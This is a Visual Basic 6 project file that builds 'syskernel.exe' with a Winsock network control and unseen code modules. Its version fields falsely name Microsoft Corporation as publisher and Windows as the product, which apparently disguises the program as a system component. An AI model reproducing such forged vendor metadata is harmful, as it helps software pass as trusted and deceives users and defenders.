Type=Exe
Form=main.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\SYSTEM\STDOLE2.TLB#OLE Automation
Module=codes; codes.bas
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Module=codes1; codes1.bas
IconForm="main"
Startup="main"
HelpFile=""
Title="syskernel"
ExeName32="syskernel.exe"
Path32="C:\WINDOWS\Desktop"
Command32=""
Name="syskernel"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="syskernel"
VersionLegalCopyright="Copyright (C) Microsoft Corp. 1998"
VersionLegalTrademarks="Copyright (C) Microsoft Corp. 1998"
VersionProductName="Microsoft(R) Windows(R) Operating System"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
